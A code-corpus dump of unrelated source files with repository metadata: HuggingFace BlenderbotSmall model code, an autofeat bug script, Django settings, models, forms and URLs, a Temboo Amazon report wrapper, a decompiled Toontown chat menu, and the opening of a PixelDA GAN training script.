            # Training with labels: caching decoder states is pointless, disable it.
            if use_cache:
                logger.warning("The `use_cache` argument is changed to `False` since `labels` is provided.")
            use_cache = False
            # Teacher forcing: derive decoder inputs by shifting the labels right
            # when the caller did not supply them explicitly.
            if decoder_input_ids is None and decoder_inputs_embeds is None:
                decoder_input_ids = shift_tokens_right(
                    labels, self.config.pad_token_id, self.config.decoder_start_token_id
                )
        outputs = self.model(
            input_ids,
            attention_mask=attention_mask,
            decoder_input_ids=decoder_input_ids,
            encoder_outputs=encoder_outputs,
            decoder_attention_mask=decoder_attention_mask,
            head_mask=head_mask,
            decoder_head_mask=decoder_head_mask,
            cross_attn_head_mask=cross_attn_head_mask,
            past_key_values=past_key_values,
            inputs_embeds=inputs_embeds,
            decoder_inputs_embeds=decoder_inputs_embeds,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias
        masked_lm_loss = None
        if labels is not None:
            # Move labels onto the logits' device so the loss also works when the
            # model is split across devices — consistent with the handling in
            # BlenderbotSmallForCausalLM.forward.
            labels = labels.to(lm_logits.device)
            loss_fct = CrossEntropyLoss()
            masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1))
        if not return_dict:
            output = (lm_logits,) + outputs[1:]
            return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
        return Seq2SeqLMOutput(
            loss=masked_lm_loss,
            logits=lm_logits,
            past_key_values=outputs.past_key_values,
            decoder_hidden_states=outputs.decoder_hidden_states,
            decoder_attentions=outputs.decoder_attentions,
            cross_attentions=outputs.cross_attentions,
            encoder_last_hidden_state=outputs.encoder_last_hidden_state,
            encoder_hidden_states=outputs.encoder_hidden_states,
            encoder_attentions=outputs.encoder_attentions,
        )
    def prepare_inputs_for_generation(
        self,
        decoder_input_ids,
        past_key_values=None,
        attention_mask=None,
        head_mask=None,
        decoder_head_mask=None,
        cross_attn_head_mask=None,
        use_cache=None,
        encoder_outputs=None,
        **kwargs,
    ):
        """Assemble the model kwargs for one decoding step during generation."""
        # cut decoder_input_ids if past is used
        if past_key_values is not None:
            decoder_input_ids = decoder_input_ids[:, -1:]
        return {
            "input_ids": None,  # encoder_outputs is defined. input_ids not needed
            "encoder_outputs": encoder_outputs,
            "past_key_values": past_key_values,
            "decoder_input_ids": decoder_input_ids,
            "attention_mask": attention_mask,
            "head_mask": head_mask,
            "decoder_head_mask": decoder_head_mask,
            "cross_attn_head_mask": cross_attn_head_mask,
            "use_cache": use_cache,  # change this to avoid caching (presumably for debugging)
        }
    @staticmethod
    def _reorder_cache(past_key_values, beam_idx):
        """Reorder cached self-attention states to follow beam-search reshuffling."""
        reordered_past = ()
        for layer_past in past_key_values:
            # cached cross_attention states don't have to be reordered -> they are always the same
            reordered_past += (
                tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2]) + layer_past[2:],
            )
        return reordered_past
# Copied from transformers.models.bart.modeling_bart.BartDecoderWrapper with Bart->BlenderbotSmall
class BlenderbotSmallDecoderWrapper(BlenderbotSmallPreTrainedModel):
    """Thin shell around :class:`BlenderbotSmallDecoder`.

    Checkpoints produced for the causal LM in combination with the
    [`EncoderDecoderModel`] framework store the decoder parameters under a
    ``decoder.`` prefix; holding the decoder in an attribute of that exact name
    lets those checkpoints load correctly.
    """
    def __init__(self, config):
        super().__init__(config)
        # The attribute name ``decoder`` is load-bearing: it must match the
        # parameter prefix used inside the pretrained checkpoints.
        self.decoder = BlenderbotSmallDecoder(config)
    def forward(self, *args, **kwargs):
        # Pure pass-through — the wrapper adds no computation of its own.
        return self.decoder(*args, **kwargs)
# Copied from transformers.models.bart.modeling_bart.BartForCausalLM with Bart->BlenderbotSmall, facebook/bart-base->facebook/blenderbot_small-90M
class BlenderbotSmallForCausalLM(BlenderbotSmallPreTrainedModel):
    """Decoder-only BlenderbotSmall with a language-modeling head (causal LM)."""
    _tied_weights_keys = ["lm_head.weight"]
    def __init__(self, config):
        # Force a decoder-only setup on a *copy* of the config so the caller's
        # config object is left untouched.
        config = copy.deepcopy(config)
        config.is_decoder = True
        config.is_encoder_decoder = False
        super().__init__(config)
        # Wrapper keeps the ``decoder.`` prefix so pretrained checkpoints load.
        self.model = BlenderbotSmallDecoderWrapper(config)
        self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
        # Initialize weights and apply final processing
        self.post_init()
    def get_input_embeddings(self):
        return self.model.decoder.embed_tokens
    def set_input_embeddings(self, value):
        self.model.decoder.embed_tokens = value
    def get_output_embeddings(self):
        return self.lm_head
    def set_output_embeddings(self, new_embeddings):
        self.lm_head = new_embeddings
    def set_decoder(self, decoder):
        self.model.decoder = decoder
    def get_decoder(self):
        return self.model.decoder
    @replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        cross_attn_head_mask: Optional[torch.Tensor] = None,
        past_key_values: Optional[List[torch.FloatTensor]] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, CausalLMOutputWithCrossAttentions]:
        r"""
        Args:
            input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
                Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
                provide it.
                Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
                [`PreTrainedTokenizer.__call__`] for details.
                [What are input IDs?](../glossary#input-ids)
            attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
                Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
                - 1 for tokens that are **not masked**,
                - 0 for tokens that are **masked**.
                [What are attention masks?](../glossary#attention-mask)
            encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
                Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
                if the model is configured as a decoder.
            encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
                Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used
                in the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`:
                - 1 for tokens that are **not masked**,
                - 0 for tokens that are **masked**.
            head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
                Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
                - 1 indicates the head is **not masked**,
                - 0 indicates the head is **masked**.
            cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
                Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`:
                - 1 indicates the head is **not masked**,
                - 0 indicates the head is **masked**.
            past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`):
                Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of
                shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of
                shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. The two additional
                tensors are only required when the model is used as a decoder in a Sequence to Sequence model.
                Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
                cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding.
                If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those
                that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of
                all `decoder_input_ids` of shape `(batch_size, sequence_length)`.
            labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
                Labels for computing the masked language modeling loss. Indices should either be in `[0, ...,
                config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored
                (masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`.
            use_cache (`bool`, *optional*):
                If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding
                (see `past_key_values`).
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
            output_hidden_states (`bool`, *optional*):
                Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
                for more detail.
            return_dict (`bool`, *optional*):
                Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
        Returns:
        Example:
        ```python
        >>> from transformers import AutoTokenizer, BlenderbotSmallForCausalLM
        >>> tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot_small-90M")
        >>> model = BlenderbotSmallForCausalLM.from_pretrained(
        ...     "facebook/blenderbot_small-90M", add_cross_attention=False
        ... )
        >>> assert model.config.is_decoder, f"{model.__class__} has to be configured as a decoder."
        >>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
        >>> outputs = model(**inputs)
        >>> logits = outputs.logits
        >>> expected_shape = [1, inputs.input_ids.shape[-1], model.config.vocab_size]
        >>> list(logits.shape) == expected_shape
        True
        ```"""
        # Per-call flags fall back to the model config when not supplied.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)
        outputs = self.model.decoder(
            input_ids=input_ids,
            attention_mask=attention_mask,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            head_mask=head_mask,
            cross_attn_head_mask=cross_attn_head_mask,
            past_key_values=past_key_values,
            inputs_embeds=inputs_embeds,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        logits = self.lm_head(outputs[0])
        loss = None
        if labels is not None:
            # Keep labels on the logits' device (supports model parallelism).
            labels = labels.to(logits.device)
            loss_fct = CrossEntropyLoss()
            loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1))
        if not return_dict:
            output = (logits,) + outputs[1:]
            return (loss,) + output if loss is not None else output
        return CausalLMOutputWithCrossAttentions(
            loss=loss,
            logits=logits,
            past_key_values=outputs.past_key_values,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
            cross_attentions=outputs.cross_attentions,
        )
    def prepare_inputs_for_generation(
        self, input_ids, past_key_values=None, attention_mask=None, use_cache=None, **kwargs
    ):
        """Assemble the model kwargs for one decoding step during generation."""
        # if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
        if attention_mask is None:
            attention_mask = input_ids.new_ones(input_ids.shape)
        # With a cache, only the newest token needs to be fed to the model.
        if past_key_values:
            input_ids = input_ids[:, -1:]
        # first step, decoder_cached_states are empty
        return {
            "input_ids": input_ids,  # encoder_outputs is defined. input_ids not needed
            "attention_mask": attention_mask,
            "past_key_values": past_key_values,
            "use_cache": use_cache,
        }
    @staticmethod
    def _reorder_cache(past_key_values, beam_idx):
        """Reorder all cached states to follow beam-search reshuffling.

        Unlike the seq2seq variant, this reorders every tensor in each layer's
        cache tuple, not just the first two self-attention entries.
        """
        reordered_past = ()
        for layer_past in past_key_values:
            reordered_past += (tuple(past_state.index_select(0, beam_idx) for past_state in layer_past),)
        return reordered_past
| [
"noreply@github.com"
] | huggingface.noreply@github.com |
be45c7de7915d1e3540fc93c4a9d108362a73d1c | 846c2bc8e37673476af67c7c6dd2f64faa4213f1 | /autofeat/generate_error.py | 8fb8b2112890d300b1dbd52670c2fbf5f914e6e1 | [
"MIT"
] | permissive | FelixNeutatz/LassoLarsCVBugGenerator | b759221da9e438ce5c9ed4c229a411fb10424646 | 40aa61e1164676cc4e55ae145c41304b6e5c36c0 | refs/heads/master | 2020-04-25T16:34:00.320062 | 2019-03-19T13:19:25 | 2019-03-19T13:19:25 | 172,917,192 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | from autofeat import AutoFeatRegression
import numpy as np
import pandas as pd
import sklearn.linear_model as lm
X = np.load('data/X.npy')
target = np.load('data/y.npy')
afreg = AutoFeatRegression(n_jobs=4)
try:
df = afreg.fit_transform(X, target)
except:
eps = 1e-08
X = np.load('/tmp/X_error.npy')
target = np.load('/tmp/target_error.npy')
reg = lm.LassoLarsCV(eps=eps)
reg.fit(X, target)
| [
"neutatz@googlemail.com"
] | neutatz@googlemail.com |
d58edd9ba4df1a10a0c057dbc474e1f1af8907ec | 6f05f7d5a67b6bb87956a22b988067ec772ba966 | /data/test/python/b451bd6e6c110e9e39aef80f9b63f26a2e0ec713settings.py | b451bd6e6c110e9e39aef80f9b63f26a2e0ec713 | [
"MIT"
] | permissive | harshp8l/deep-learning-lang-detection | 93b6d24a38081597c610ecf9b1f3b92c7d669be5 | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | refs/heads/master | 2020-04-07T18:07:00.697994 | 2018-11-29T23:21:23 | 2018-11-29T23:21:23 | 158,597,498 | 0 | 0 | MIT | 2018-11-21T19:36:42 | 2018-11-21T19:36:41 | null | UTF-8 | Python | false | false | 522 | py | #
# enable giraffe's requirements and some of the giraffe apps
#
INSTALLED_APPS = (
# ...
# all your other apps, plus:
'south',
'djcelery',
'giraffe.aggregator',
'giraffe.publisher',
)
#
# django-celery settings:
#
# http://celeryq.org/docs/django-celery/getting-started/first-steps-with-django.html
#
BROKER_HOST = 'localhost'
BROKER_PORT = 5672
BROKER_USER = 'giraffe'
BROKER_PASSWORD = 'giraffe'
BROKER_VHOST = '/'
CELERY_RESULT_BACKEND = 'amqp'
import djcelery
djcelery.setup_loader()
| [
"aliostad+github@gmail.com"
] | aliostad+github@gmail.com |
f8a5912c87c8cc8130cf9cee0bde06306260708d | 0188f7dfe26a2b7f925814f202a9be653abcb859 | /prodinward/models.py | a30818056578c48db2b3b619a37bf03fb39e0f50 | [] | no_license | viralsir/Furniture_Inhouse_app | d5ac0a764681816dd63451b7d82303f1538ef2ec | d194251e93c537305d97eff968a5584a4c9de12b | refs/heads/master | 2023-06-15T16:03:07.386722 | 2021-07-08T10:43:14 | 2021-07-08T10:43:14 | 377,119,495 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | from django.db import models
from django.urls import reverse
from product.models import product
# Create your models here.
class prodinward(models.Model):
    """One inward (goods-received) line for a product, with pricing and billing state."""
    # Product this inward row belongs to; deleting the product cascades to its rows.
    # NOTE(review): related_name="product" is an odd reverse accessor name — confirm.
    prod = models.ForeignKey(product, on_delete=models.CASCADE, related_name="product")
    # NOTE(review): quantity is stored as text, not a number — confirm intentional.
    quantity = models.CharField(max_length=100)
    # NOTE(review): max_length has no effect on FloatField; Django ignores it here.
    rate = models.FloatField(max_length=100)
    price = models.FloatField(max_length=100)
    discount = models.FloatField(max_length=100, blank=True, null=True)
    gst = models.FloatField(max_length=100, blank=True, null=True)
    # Billing lifecycle: is_biiled flags completion, billed counts what was billed.
    is_biiled=models.BooleanField(default=False)
    billed=models.IntegerField(default=0)
    def __str__(self):
        # Display label used by admin/shell: the line price only.
        return f"{self.price}"
    def get_absolute_url(self):
        # Redirect target after create/update views: the URL named "closed".
        return reverse("closed")
"viralsir2018@gmail.com"
] | viralsir2018@gmail.com |
768714cdb17e4f577667dce3bd002cfd50f0e577 | c5675cf0c2a83075e8a76ff54caa7384e4f4d554 | /mdevbox/forms.py | c8320d31b7b1db820b88db4d693ec0ff62d96072 | [] | no_license | Quantumke/mdevbox | 68969742a828e22166750c0dfb00d5d3b21f30da | 6d696423af00f7cd899e5bcfa8dc3f792de19891 | refs/heads/master | 2016-09-13T06:23:21.595605 | 2016-05-06T08:47:13 | 2016-05-06T08:47:13 | 56,508,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | from mdevbox.models import *
from django.contrib.auth.models import User
from django import forms
from .models import *
#-------------------------------------------------------------------------------------------------------------------- user auth
class developersemployment(forms.ModelForm):
    """ModelForm collecting a developer's previous-employment details."""
    class Meta:
        model = developers_employment
        fields = ('email', 'speciality', 'previous_employer', 'role_previous_employment','begin_previous_employment','end_previous_employment',)
class developerseducation(forms.ModelForm):
    """ModelForm collecting a developer's highest-education record."""
    class Meta:
        model=developers_education
        fields=('highest_education', 'institute_name','course','begin_education','end_education')
class developersportfolio(forms.ModelForm):
    """ModelForm collecting one portfolio entry (name, tech, link, description)."""
    class Meta:
        model=developers_portfolio
        fields=( 'portfoli_name', 'portfoli_tech', 'portfoli_link', 'portfoli_desc',)
class hire(forms.ModelForm):
    """ModelForm for submitting a hire request.

    NOTE(review): this form has the same name as the model referenced in Meta
    (brought in via the star imports above). While this class body executes,
    ``hire`` presumably resolves to the model class; after the definition,
    ``hire`` in this module refers to the form, shadowing the model — confirm
    this is intended.
    """
    class Meta:
        model=hire
        fields=('company','job_title','job_description', )
class postjob(forms.ModelForm):
    """ModelForm for publishing a job posting (company, title, description, pay)."""
    class Meta:
        model=post_job
        fields=('company', 'job_title', 'job_description', 'pay',)
| [
"nguruben@gmail.com"
] | nguruben@gmail.com |
0522f8ff0a25769612c10267738a1c953edf88f6 | 961ddbe3e6a75339cf94679e0a7d313cd7a6c1d9 | /goods/urls.py | 3a54b874b8b147e627a2bbb7a0753d45296a6c58 | [
"Apache-2.0"
] | permissive | chinxianjun2016/GreaterWMS | 41b3a8d855f7f00f5bd91364339640f049a3b7dc | aacd0e15e0114f103eb57002e93670c008cce63b | refs/heads/master | 2023-02-07T13:24:10.313463 | 2021-01-02T01:52:41 | 2021-01-02T01:52:41 | 322,737,456 | 0 | 0 | Apache-2.0 | 2021-01-02T01:52:42 | 2020-12-19T00:50:07 | null | UTF-8 | Python | false | false | 1,112 | py | """singosgu URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, re_path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path(r'', views.APIViewSet.as_view({"get": "list", "post": "create"}), name="goods"),
re_path(r'^(?P<pk>\d+)/$', views.APIViewSet.as_view({
'get': 'retrieve',
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy'
}), name="goods_1"),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"singosgu@gmail.com"
] | singosgu@gmail.com |
e9bf2dd1bb681537e355f54163005cd1bb9143ea | 8839bd1f2e35726b6c8066985690fa2fa86b09a6 | /5.pyAI-K210/1.基础实验/4.外部中断/main.py | 5e4efe593247c0e8f7668025ad9582d34f1f0e97 | [
"MIT"
] | permissive | elektrik-elektronik-muhendisligi/MicroPython-Examples-1 | a9532b06aba470f7f26f841929f4fb145549f70b | f7b08e95ff73e3417af21918c9c6bcf2f83281c6 | refs/heads/master | 2021-05-25T22:58:36.207098 | 2020-04-01T09:50:53 | 2020-04-01T09:50:53 | 253,956,073 | 1 | 0 | null | 2020-04-08T01:39:46 | 2020-04-08T01:39:45 | null | UTF-8 | Python | false | false | 726 | py | '''
实验名称:外部中断
版本: v1.0
日期: 2019.12
作者: 01Studio
说明:通过按键改变 LED 的亮灭状态(外部中断方式)
'''
from Maix import GPIO
from fpioa_manager import fm
import utime
#注册IO,注意高速GPIO口才有中断
fm.register(12, fm.fpioa.GPIO0)
fm.register(16, fm.fpioa.GPIOHS0)
#构建lED和KEY对象
LED_B=GPIO(GPIO.GPIO0,GPIO.OUT,value=1)
KEY=GPIO(GPIO.GPIOHS0, GPIO.IN, GPIO.PULL_UP)
#LED状态表示
state = 1
#中断回调函数
def fun(KEY):
global state
utime.sleep_ms(10) #消除抖动
if KEY.value()==0: #确认按键被按下
state = not state
LED_B.value(state)
#开启中断,下降沿触发
KEY.irq(fun, GPIO.IRQ_FALLING)
| [
"237827161@qq.com"
] | 237827161@qq.com |
0aef20c455303401003a675deed4e7888a3a0865 | a86ca34e23afaf67fdf858df9e47847606b23e0c | /lib/temboo/Library/Amazon/Marketplace/Reports/MerchantListingsReport.py | f9c80bd5c6ad689f862a6e51a89af891e22ad131 | [] | no_license | miriammelnick/dont-get-mugged | 6026ad93c910baaecbc3f5477629b0322e116fa8 | 1613ee636c027ccc49c3f84a5f186e27de7f0f9d | refs/heads/master | 2021-01-13T02:18:39.599323 | 2012-08-12T23:25:47 | 2012-08-12T23:25:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,736 | py |
###############################################################################
#
# MerchantListingsReport
# Returns a tab-delimited report of active listings.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
class MerchantListingsReport(Choreography):
    """
    Choreography returning a tab-delimited report of active Amazon Marketplace
    listings. Construct with a TembooSession object containing a valid set of
    Temboo credentials.
    """
    def __init__(self, temboo_session):
        # Bind this choreo to its fixed path inside the Temboo library.
        Choreography.__init__(self, temboo_session, '/Library/Amazon/Marketplace/Reports/MerchantListingsReport')
    def new_input_set(self):
        # Factory used to collect the execution input parameters.
        return MerchantListingsReportInputSet()
    def _make_result_set(self, result, path):
        # Internal factory wrapping raw results in the typed result set.
        return MerchantListingsReportResultSet(result, path)
    def _make_execution(self, session, exec_id, path):
        # Internal factory for asynchronous execution handles.
        return MerchantListingsReportChoreographyExecution(session, exec_id, path)
"""
An InputSet with methods appropriate for specifying the inputs to the MerchantListingsReport
choreography. The InputSet object is used to specify input parameters when executing this choreo.
"""
class MerchantListingsReportInputSet(InputSet):
"""
Set the value of the AWSAccessKeyId input for this choreography. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
def set_AWSAccessKeyId(self, value):
InputSet._set_input(self, 'AWSAccessKeyId', value)
"""
Set the value of the AWSMarketplaceId input for this choreography. ((required, string) The Marketplace ID provided by Amazon Web Services.)
"""
def set_AWSMarketplaceId(self, value):
InputSet._set_input(self, 'AWSMarketplaceId', value)
"""
Set the value of the AWSMerchantId input for this choreography. ((required, string) The Merchant ID provided by Amazon Web Services.)
"""
def set_AWSMerchantId(self, value):
InputSet._set_input(self, 'AWSMerchantId', value)
"""
Set the value of the AWSSecretKeyId input for this choreography. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
def set_AWSSecretKeyId(self, value):
InputSet._set_input(self, 'AWSSecretKeyId', value)
"""
Set the value of the Endpoint input for this choreography. ((optional, string) The base URL for the MWS endpoint. Defaults to mws.amazonservices.co.uk.)
"""
def set_Endpoint(self, value):
InputSet._set_input(self, 'Endpoint', value)
"""
Set the value of the TimeToWait input for this choreography. ((optional, integer) By default, the Choreo will wait for 5 minutes to see if the report is ready for retrieval. Max is 120 minutes.)
"""
def set_TimeToWait(self, value):
InputSet._set_input(self, 'TimeToWait', value)
"""
A ResultSet with methods tailored to the values returned by the MerchantListingsReport choreography.
The ResultSet object is used to retrieve the results of a choreography execution.
"""
class MerchantListingsReportResultSet(ResultSet):
"""
Retrieve the value for the "Report" output from this choreography execution. ((multiline) The report contents.)
"""
def get_Report(self):
return self._output.get('Report', None)
"""
Retrieve the value for the "GeneratedReportId" output from this choreography execution. ((integer) The GeneratedReportId parsed from the Amazon response.)
"""
def get_GeneratedReportId(self):
return self._output.get('GeneratedReportId', None)
"""
Retrieve the value for the "ReportProcessingStatus" output from this choreography execution. ((string) The status of the report request parsed from the Amazon response.)
"""
def get_ReportProcessingStatus(self):
return self._output.get('ReportProcessingStatus', None)
"""
Retrieve the value for the "ReportRequestId" output from this choreography execution. ((integer) The ReportRequestId parsed from the Amazon response. This id is used in GetReportRequestList.)
"""
def get_ReportRequestId(self):
return self._output.get('ReportRequestId', None)
class MerchantListingsReportChoreographyExecution(ChoreographyExecution):
    """Execution handle for an in-flight MerchantListingsReport choreography run."""
    def _make_result_set(self, response, path):
        # Wrap the raw response in the typed result set for this choreo.
        return MerchantListingsReportResultSet(response, path)
| [
"miriam@famulus"
] | miriam@famulus |
d404e0bda811fd33c2e96dbfaa0870131e8184a9 | fe19d2fac4580d463132e61509bd6e3cc2cf958d | /toontown/speedchat/TTSCHalloweenMenu.py | 9451e1ceac323d44fae4773d6c57b1a6f0a65bf7 | [] | no_license | t00nt0wn1dk/c0d3 | 3e6db6dd42c3aa36ad77709cf9016176a3f3a44f | 7de105d7f3de0f8704b020e32fd063ee2fad8d0d | refs/heads/master | 2021-01-01T16:00:15.367822 | 2015-03-21T21:25:52 | 2015-03-21T21:25:55 | 32,647,654 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,911 | py | # 2013.08.22 22:25:08 Pacific Daylight Time
# Embedded file name: toontown.speedchat.TTSCHalloweenMenu
from direct.showbase import PythonUtil
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCMenuHolder import SCMenuHolder
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from otp.otpbase import OTPLocalizer
# (menu section title, list of SpeedChat phrase ids). A section id of -1 means
# the phrases are linked directly into the top-level menu instead of a submenu.
HalloweenMenu = [(OTPLocalizer.HalloweenMenuSections[0], [30250, 30251, 30252])]

class TTSCHalloweenMenu(SCMenu):
    """SpeedChat menu holding the Halloween event phrases."""
    __module__ = __name__

    def __init__(self):
        SCMenu.__init__(self)
        self.__messagesChanged()

    def destroy(self):
        SCMenu.destroy(self)

    def clearMenu(self):
        SCMenu.clearMenu(self)

    def __linkPhrases(self, phrases, target):
        # Append one SCStaticTextTerminal per phrase id to `target`.
        # As in the original (duplicated) loops, stop at the first phrase id
        # missing from the SpeedChat static-text table.
        for phrase in phrases:
            if phrase not in OTPLocalizer.SpeedChatStaticText:
                print('warning: tried to link Halloween phrase %s which does not seem to exist' % phrase)
                break
            target.append(SCStaticTextTerminal(phrase))

    def __messagesChanged(self):
        """Rebuild the menu contents from the HalloweenMenu table."""
        self.clearMenu()
        try:
            # Bail out silently if the local avatar does not exist yet
            # (e.g. during startup). The original bound it to an unused local.
            base.localAvatar
        except:
            return
        # Fix: the phrase-linking loop was duplicated verbatim in both
        # branches; it is factored into __linkPhrases with the same semantics.
        for section in HalloweenMenu:
            if section[0] == -1:
                # Flat section: phrases go straight into this menu.
                self.__linkPhrases(section[1], self)
            else:
                # Named section: phrases are collected under a submenu holder.
                menu = SCMenu()
                self.__linkPhrases(section[1], menu)
                self.append(SCMenuHolder(str(section[0]), menu))
# okay decompyling C:\Users\Maverick\Documents\Visual Studio 2010\Projects\Unfreezer\py2\toontown\speedchat\TTSCHalloweenMenu.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2013.08.22 22:25:08 Pacific Daylight Time
| [
"anonymoustoontown@gmail.com"
] | anonymoustoontown@gmail.com |
5cadfcc566e5d20ec4df60ec331f7b1069d07004 | 5d3c546ed535fda1a62c2bd1a2dd36d86ea3049d | /manage.py | 55843edd0f9d4f7175279abbc27ee7621badd553 | [] | no_license | rcthomas/decals-web | 6e642082c7daf22f41f3f1ed0ea4db6f74bed682 | 64467865227d33124f42febdbd09e49e64e0dbfa | refs/heads/master | 2021-05-10T15:46:42.048404 | 2018-01-22T20:06:09 | 2018-01-22T20:06:09 | 118,561,087 | 0 | 0 | null | 2018-01-23T05:13:27 | 2018-01-23T05:13:26 | null | UTF-8 | Python | false | false | 249 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Default the settings module for this Django project; an explicit
    # DJANGO_SETTINGS_MODULE already present in the environment still wins
    # (setdefault does not overwrite).
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "decals.settings")
    from django.core.management import execute_from_command_line
    execute_from_command_line(sys.argv)
| [
"dstndstn@gmail.com"
] | dstndstn@gmail.com |
690d8d6d04910f8f8a9d04cfd88444c258e5ac33 | 00fc9d9e0de636809a66a05ddc8264682fb46297 | /.history/implementations/pixelda/pixelda_try_20190106191202.py | 947a40ba80662b98b8dc38df4f9ffb34f19e695c | [
"MIT"
] | permissive | Napkin-DL/PyTorch-GAN | 56746d490da1064cd895be4825f8b8c96acb36fa | 4668fb434a74a4e4771631944e4abfb0ec1c8795 | refs/heads/master | 2020-04-14T07:55:12.381763 | 2019-01-06T11:51:52 | 2019-01-06T11:51:52 | 163,724,755 | 0 | 0 | MIT | 2019-01-01T08:59:51 | 2019-01-01T08:59:51 | null | UTF-8 | Python | false | false | 17,169 | py | import argparse
import os
import numpy as np
import math
import itertools
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
from mnistm import MNISTM
import torch.nn as nn
import torch.nn.functional as F
import torch
# Directory for generated image samples written during training.
os.makedirs('images', exist_ok=True)

# Command-line hyper-parameters for PixelDA-style training.
parser = argparse.ArgumentParser()
parser.add_argument('--n_epochs', type=int, default=200, help='number of epochs of training')
parser.add_argument('--batch_size', type=int, default=64, help='size of the batches')
parser.add_argument('--lr', type=float, default=0.0002, help='adam: learning rate')
parser.add_argument('--b1', type=float, default=0.5, help='adam: decay of first order momentum of gradient')
parser.add_argument('--b2', type=float, default=0.999, help='adam: decay of first order momentum of gradient')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
